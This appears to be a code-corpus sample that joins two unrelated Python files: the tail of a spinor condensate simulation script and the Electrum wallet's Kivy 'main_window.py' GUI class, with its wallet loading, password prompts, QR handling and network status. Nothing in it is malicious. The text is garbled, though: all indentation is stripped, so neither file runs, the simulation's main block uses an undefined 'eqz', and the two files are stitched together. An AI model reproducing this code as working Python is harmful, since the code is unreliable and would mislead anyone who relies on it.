for i in range(len(delta_t)):
fp.write('{:<15}{:<15}{:<15}{:<15}{:<15}\n'.format(delta_t[i],
emw[i],
eqz + emw[i],
c[i],
n_step[i]))
fp.write('\n')
fp.write(outstring1.format('t(s)', 'mean', 'stddev', 'norm'))
for time_step in range(len(sum_of_means)):
t = time[time_step]
mean = sum_of_means[time_step] / norm[time_step]
meansq = sum_of_meansq[time_step] / norm[time_step]
fp.write(outstring.format(t, mean, np.sqrt(
meansq - mean * mean), norm[time_step]))
def solve_system(b_field, n_tot, mag, mag_range, atom_range, spinor_phase, n_0,
ndiv, delta_t, c, emw, n_step):
eqz = np.real(0.0277 * b_field**2)
# now we want to allocate numpy array
num_par = 2 * mag_range + 1
sum_of_means = np.zeros((num_par, sum(n_step) + 1)
) # one for each time step
sum_of_meansq = np.zeros((num_par, sum(n_step) + 1))
norm = np.zeros((num_par, sum(n_step) + 1))
time = np.zeros((num_par, sum(n_step) + 1))
#density = np.zeros(sum(n_step) * int(n_tot)+atom_range+1)
if n_0 < 1e-20:
alpha_zero = np.complex(0, 0)
else:
alpha_zero = np.sqrt(n_0) * np.exp(np.complex(0, spinor_phase / 2))
if (n_tot - n_0 + mag) < 1e-20:
alpha_plus = np.complex(0, 0)
else:
alpha_plus = np.complex(np.sqrt(mag + (n_tot - n_0 - mag) / 2), 0)
if (n_tot - n_0 - mag) < 1e-20:
alpha_minus = np.complex(0, 0)
else:
alpha_minus = np.complex(np.sqrt((n_tot - n_0 - mag) / 2), 0)
# calculate normalization factor
norm_factor = (abs(alpha_minus)**2 + abs(alpha_zero)
** 2 + abs(alpha_plus)**2) / 2
params = {
'n_tot': n_tot,
'atom_range': atom_range,
'n_0': n_0,
'eqz': eqz,
'ndiv': ndiv,
'delta_t': delta_t,
'c': c,
'emw': emw,
'n_step': n_step,
'alpha_minus': alpha_minus,
'alpha_plus': alpha_plus,
'alpha_zero': alpha_zero,
'norm_factor': norm_factor
}
# set up multiprocessing
queue = Queue()
procs = {}
# now loop over and send to difference processors
for m in range(mag - mag_range, mag + mag_range + 1):
k = m - (mag - mag_range)
procs[k] = Process(target=calc_m_loop, args=(queue, m, params))
procs[k].start()
# get the results
for m in range(mag - mag_range, mag + mag_range + 1):
k = m - (mag - mag_range)
ans = queue.get()
time[k] = ans[0]
sum_of_means[k] = ans[1]
sum_of_meansq[k] = ans[2]
norm[k] = ans[3]
# sum the results
time = time[0]
sum_of_means = np.sum(sum_of_means, axis=0)
sum_of_meansq = np.sum(sum_of_meansq, axis=0)
norm = np.sum(norm, axis=0)
return sum_of_means, sum_of_meansq, norm, time
if __name__ == '__main__':
init_state_solver = 'coherent_state'
propogate = 'Chebychev'
species = 'Na'
b_field = 0 # BField in microtesla
n_tot = 2000 # TotalAtomNumber
mag = 0 # Magnetization
mag_range = 2 # MagRange
atom_range = 2 # AtomRange
spinor_phase = 0 # SpinorPhase
n_0 = n_tot - 2 # N_0 numbers tarting in m=0
c_init = 24 # C_init in Hz
filename = 'results.txt'
ndiv = 3
delta_t = [0.04, 0.001, 0.06]
c = [c_init, c_init, c_init]
emw = [-2.5, -426, -2.5]
n_step = [30, 6, 30]
start = timemod.time()
sum_of_means, sum_of_meansq, norm, time = solve_system(b_field,
n_tot, mag, mag_range, atom_range, spinor_phase, n_0, ndiv, delta_t, c, emw, n_step)
write_out(filename, b_field, n_0, c_init, n_tot, mag, mag_range, atom_range,
spinor_phase, init_state_solver, propogate, delta_t, emw, eqz,
c, n_step, sum_of_means, sum_of_meansq, norm, time)
end = timemod.time()
print('Calculation Complete')
print('Norm recovered', np.average(norm))
print('Time for Calculation:', end - start)
print('File written to:', filename)
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import asyncio
from typing import TYPE_CHECKING, Optional, Union, Callable, Sequence
from electrum.storage import WalletStorage, StorageReadWriteError
from electrum.wallet_db import WalletDB
from electrum.wallet import Wallet, InternalAddressCorruption, Abstract_Wallet
from electrum.plugin import run_hook
from electrum import util
from electrum.util import (profiler, InvalidPassword, send_exception_to_crash_reporter,
format_satoshis, format_satoshis_plain, format_fee_satoshis,
PR_PAID, PR_FAILED, maybe_extract_bolt11_invoice)
from electrum import blockchain
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from .i18n import _
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
from .uix.dialogs.password_dialog import PasswordDialog, PincodeDialog
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
from .uix.dialogs.question import Question
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
# register widget cache for keeping memory down timeout to forever to cache
# the data
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum.gui.kivy.uix.screens')
# Register fonts without this you won't be able to use bold/italic...
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum.util import (base_units, NoDynamicFeeEstimates, decimal_point_to_base_unit_name,
base_unit_name_to_decimal_point, NotEnoughFunds, UnknownBaseUnit,
DECIMAL_POINT_DEFAULT)
from .uix.dialogs.lightning_open_channel import LightningOpenChannelDialog
from .uix.dialogs.lightning_channels import LightningChannelsDialog
if TYPE_CHECKING:
from . import ElectrumGui
from electrum.simple_config import SimpleConfig
from electrum.plugin import Plugins
from electrum.paymentrequest import PaymentRequest
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_forkpoint = NumericProperty(0)
lightning_gossip_num_peers = NumericProperty(0)
lightning_gossip_num_nodes = NumericProperty(0)
lightning_gossip_num_channels = NumericProperty(0)
lightning_gossip_num_queries = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(auto_connect=self.auto_connect)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
oneserver = BooleanProperty(False)
def on_oneserver(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(oneserver=self.oneserver)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_oneserver(self, x):
self.oneserver = not self.oneserver
proxy_str = StringProperty('')
def update_proxy_str(self, proxy: dict):
mode = proxy.get('mode')
host = proxy.get('host')
port = proxy.get('port')
self.proxy_str = (host + ':' + port) if mode else _('None')
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from electrum import constants
pp = servers.get(host, constants.net.DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def maybe_switch_to_server(self, server_str: str):
from electrum.interface import ServerAddr
net_params = self.network.get_parameters()
try:
server = ServerAddr.from_str_with_inference(server_str)
except Exception as e:
self.show_error(_("Invalid server details: {}").format(repr(e)))
return
net_params = net_params._replace(server=server)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items())
for chain_id, b in blockchain_items:
if name == b.get_name():
self.network.run_from_another_thread(self.network.follow_chain_given_id(chain_id))
chain_objects = [blockchain.blockchains.get(chain_id) for chain_id in chains]
chain_objects = filter(lambda b: b is not None, chain_objects)
names = [b.get_name() for b in chain_objects]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
android_backups = BooleanProperty(False)
def on_android_backups(self, instance, x):
self.electrum_config.set_key('android_backups', self.android_backups, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
if self.wallet:
self.wallet.use_change = self.use_change
self.wallet.db.put('use_change', self.use_change)
self.wallet.save_db()
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def set_ln_invoice(self, invoice):
self.switch_to('send')
self.send_screen.set_ln_invoice(invoice)
def on_new_intent(self, intent):
data = intent.getDataString()
if intent.getScheme() == 'bitcoin':
self.set_URI(data)
elif intent.getScheme() == 'lightning':
self.set_ln_invoice(data)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_status()
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
if self.wallet:
self.wallet.clear_coin_price_cache()
self._trigger_update_history()
def on_fee_histogram(self, *args):
self._trigger_update_history()
def on_request_status(self, event, key, status):
if key not in self.wallet.receive_requests:
return
self.update_tab('receive')
if self.request_popup and self.request_popup.key == key:
self.request_popup.update_status()
if status == PR_PAID:
self.show_info(_('Payment Received') + '\n' + key)
self._trigger_update_history()
def on_invoice_status(self, event, key):
req = self.wallet.get_invoice(key)
if req is None:
return
status = req['status']
# todo: update single item
self.update_tab('send')
if self.invoice_popup and self.invoice_popup.key == key:
self.invoice_popup.update_status()
def on_payment_succeeded(self, event, key):
self.show_info(_('Payment was sent'))
self._trigger_update_history()
def on_payment_failed(self, event, key, reason):
self.show_info(_('Payment failed') + '\n\n' + reason)
def _get_bu(self):
decimal_point = self.electrum_config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
return decimal_point_to_base_unit_name(decimal_point)
except UnknownBaseUnit:
return decimal_point_to_base_unit_name(DECIMAL_POINT_DEFAULT)
def _set_bu(self, value):
assert value in base_units.keys()
decimal_point = base_unit_name_to_decimal_point(value)
self.electrum_config.set_key('decimal_point', decimal_point, True)
self._trigger_update_status()
self._trigger_update_history()
wallet_name = StringProperty(_('No Wallet'))
base_unit = AliasProperty(_get_bu, _set_bu)
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`orientation` is a read only `AliasProperty` Defaults to 'landscape'
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Defines tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`ui_mode` is a read only `AliasProperty` Defaults to 'phone'
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None # type: Optional[Abstract_Wallet]
self.pause_time = 0
self.asyncio_loop = asyncio.get_event_loop()
self.password = None
App.__init__(self)#, **kwargs)
self.electrum_config = config = kwargs.get('config', None) # type: SimpleConfig
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None) # type: Network
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
net_params = self.network.get_parameters()
self.server_host = net_params.server.host
self.server_port = str(net_params.server.port)
self.auto_connect = net_params.auto_connect
self.oneserver = net_params.oneserver
self.proxy_config = net_params.proxy if net_params.proxy else {}
self.update_proxy_str(self.proxy_config)
self.plugins = kwargs.get('plugins', None) # type: Plugins
self.gui_object = kwargs.get('gui_object', None) # type: ElectrumGui
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updating a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
self._periodic_update_status_during_sync = Clock.schedule_interval(self.update_wallet_synchronizing_progress, .5)
# cached dialogs
self._settings_dialog = None
self._pincode_dialog = None
self._password_dialog = None
self._channels_dialog = None
self._addresses_dialog = None
self.fee_status = self.electrum_config.get_fee_status()
self.invoice_popup = None
self.request_popup = None
def on_pr(self, pr: 'PaymentRequest'):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = pr.get_id()
invoice = self.wallet.get_invoice(key) # FIXME wrong key...
if invoice and invoice['status'] == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
elif pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum.bitcoin import is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('bitcoin:'):
self.set_URI(data)
return
if data.startswith('channel_backup:'):
self.import_channel_backup(data[15:])
return
bolt11_invoice = maybe_extract_bolt11_invoice(data)
if bolt11_invoice is not None:
self.set_ln_invoice(bolt11_invoice)
return
# try to decode transaction
from electrum.transaction import tx_from_any
try:
tx = tx_from_any(data)
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, is_lightning, key):
from .uix.dialogs.request_dialog import RequestDialog
request = self.wallet.get_request(key)
data = request['invoice'] if is_lightning else request['URI']
self.request_popup = RequestDialog('Request', data, key, is_lightning=is_lightning)
self.request_popup.open()
def show_invoice(self, is_lightning, key):
from .uix.dialogs.invoice_dialog import InvoiceDialog
invoice = self.wallet.get_invoice(key)
if not invoice:
return
data = invoice['invoice'] if is_lightning else key
self.invoice_popup = InvoiceDialog('Invoice', data, key)
self.invoice_popup.open()
def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None):
from .uix.dialogs.qr_dialog import QRDialog
def on_qr_failure():
popup.dismiss()
msg = _('Failed to display QR code.')
if text_for_clipboard:
msg += '\n' + _('Text copied to clipboard.')
self._clipboard.copy(text_for_clipboard)
Clock.schedule_once(lambda dt: self.show_info(msg))
popup = QRDialog(title, data, show_text, failure_cb=on_qr_failure,
text_for_clipboard=text_for_clipboard)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
except Exception as e: # exc would otherwise get lost
send_exception_to_crash_reporter(e)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('electrum/gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def handle_crash_on_startup(func):
def wrapper(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
except Exception as e:
from .uix.dialogs.crash_reporter import CrashReporter
# show the crash reporter, and when it's closed, shutdown the app
cr = CrashReporter(self, exctype=type(e), value=e, tb=e.__traceback__)
cr.on_dismiss = lambda: self.stop()
Clock.schedule_once(lambda _, cr=cr: cr.open(), 0)
return wrapper
@handle_crash_on_startup
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.process_time()))
Window.bind(size=self.on_size, on_keyboard=self.on_keyboard)
Window.bind(on_key_down=self.on_key_down)
#Window.softinput_mode = 'below_target'
self.on_size(Window, Window.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'status', 'new_transaction', 'verified']
util.register_callback(self.on_network_event, interests)
util.register_callback(self.on_fee, ['fee'])
util.register_callback(self.on_fee_histogram, ['fee_histogram'])
util.register_callback(self.on_quotes, ['on_quotes'])
util.register_callback(self.on_history, ['on_history'])
util.register_callback(self.on_channels, ['channels_updated'])
util.register_callback(self.on_channel, ['channel'])
util.register_callback(self.on_invoice_status, ['invoice_status'])
util.register_callback(self.on_request_status, ['request_status'])
util.register_callback(self.on_payment_failed, ['payment_failed'])
util.register_callback(self.on_payment_succeeded, ['payment_succeeded'])
util.register_callback(self.on_channel_db, ['channel_db'])
util.register_callback(self.set_num_peers, ['gossip_peers'])
util.register_callback(self.set_unknown_channels, ['unknown_channels'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True))
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def on_channel_db(self, event, num_nodes, num_channels, num_policies):
self.lightning_gossip_num_nodes = num_nodes
self.lightning_gossip_num_channels = num_channels
def set_num_peers(self, event, num_peers):
self.lightning_gossip_num_peers = num_peers
def set_unknown_channels(self, event, unknown):
self.lightning_gossip_num_queries = unknown
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, wizard, storage, db):
if storage:
wallet = Wallet(db, storage, config=self.electrum_config)
wallet.start_network(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
elif not self.wallet:
# wizard did not return a wallet; and there is no wallet open atm
# try to open last saved wallet (potentially start wizard again)
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True),
ask_if_wizard=True)
def _on_decrypted_storage(self, storage: WalletStorage):
assert storage.is_past_initial_decryption()
db = WalletDB(storage.read(), manual_upgrades=False)
if db.requires_upgrade():
wizard = Factory.InstallWizard(self.electrum_config, self.plugins)
wizard.path = storage.path
wizard.bind(on_wizard_complete=self.on_wizard_complete)
wizard.upgrade_storage(storage, db)
else:
self.on_wizard_complete(None, storage, db)
def load_wallet_by_name(self, path, ask_if_wizard=False):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet.has_password():
def on_success(x):
# save password in memory
self.password = x
self.load_wallet(wallet)
self.password_dialog(
basename = wallet.basename(),
check_password=wallet.check_password,
on_success=on_success,
on_failure=self.stop)
else:
self.load_wallet(wallet)
else:
def launch_wizard():
storage = WalletStorage(path)
if not storage.file_exists():
wizard = Factory.InstallWizard(self.electrum_config, self.plugins)
wizard.path = path
wizard.bind(on_wizard_complete=self.on_wizard_complete)
wizard.run('new')
else:
if storage.is_encrypted():
if not storage.is_encrypted_with_user_pw():
raise Exception("Kivy GUI does not support this type of encrypted wallet files.")
def on_password(pw):
self.password = pw
storage.decrypt(pw)
self._on_decrypted_storage(storage)
self.password_dialog(
basename = storage.basename(),
check_password=storage.check_password,
on_success=on_password,
on_failure=self.stop)
return
self._on_decrypted_storage(storage)
if not ask_if_wizard:
launch_wizard()
else:
def handle_answer(b: bool):
if b:
launch_wizard()
else:
try: os.unlink(path)
except FileNotFoundError: pass
self.stop()
d = Question(_('Do you want to launch the wizard again?'), handle_answer)
d.open()
def on_stop(self):
Logger.info('on_stop')
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def lightning_open_channel_dialog(self):
d = LightningOpenChannelDialog(self)
d.open()
def lightning_channels_dialog(self):
if self._channels_dialog is None:
self._channels_dialog = LightningChannelsDialog(self)
self._channels_dialog.open()
def on_channel(self, evt, chan):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def on_channels(self, evt, wallet):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def wallets_dialog(self):
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.path = os.path.dirname(self.electrum_config.get_wallet_path())
d.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
self.wallets_dialog()
elif name == 'status':
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
elif name.endswith("_dialog"):
getattr(self, name)()
else:
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize The Ux part of electrum. This function performs the basic
tasks of setting up the ui.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "electrum/gui/icons/electrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
net_params = self.network.get_parameters()
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_max_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
else:
self.server_host = str(net_params.server.host) + ' (connecting...)'
self.proxy_config = net_params.proxy or {}
self.update_proxy_str(self.proxy_config)
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'network_updated':
self._trigger_update_interfaces()
self._trigger_update_status()
elif event == 'wallet_updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'blockchain_updated':
# to update number of confirmations in history
self._trigger_update_wallet()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet: 'Abstract_Wallet'):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.wallet_name = wallet.basename()
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return
self.use_change = self.wallet.use_change
self.electrum_config.save_last_wallet(wallet)
def update_status(self, *dt):
if not self.wallet:
return
if self.network is None or not self.network.is_connected():
status = _("Offline")
elif self.network.is_connected():
self.num_blocks = self.network.get_local_height()
server_height = self.network.get_server_height()
server_lag = self.num_blocks - server_height
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
status = ("{} [size=18dp]({}/{})[/size]"
.format(_("Synchronizing..."), num_answered, num_sent))
elif server_lag > 1:
status = _("Server is lagging ({} blocks)").format(server_lag)
else:
status = ''
else:
status = _("Disconnected")
if status:
self.balance = status
self.fiat_balance = status
else:
c, u, x = self.wallet.get_balance()
l = int(self.wallet.lnworker.get_balance()) if self.wallet.lnworker else 0
text = self.format_amount(c + x + u + l)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(c+u+x) + ' [size=22dp]%s[/size]'% self.fx.ccy
def update_wallet_synchronizing_progress(self, *dt):
if not self.wallet:
return
if not self.wallet.up_to_date:
self._trigger_update_status()
def get_max_amount(self):
from electrum.transaction import PartialTxOutput
if run_hook('abort_send', self):
return ''
inputs = self.wallet.get_spendable_coins(None)
if not inputs:
return ''
addr = None
if self.send_screen:
addr = str(self.send_screen.screen.address)
if not addr:
addr = self.wallet.dummy_address()
outputs = [PartialTxOutput.from_address_and_value(addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(coins=inputs, outputs=outputs)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, 0, self.decimal_point(), is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000) + ' sat/byte'
#@profiler
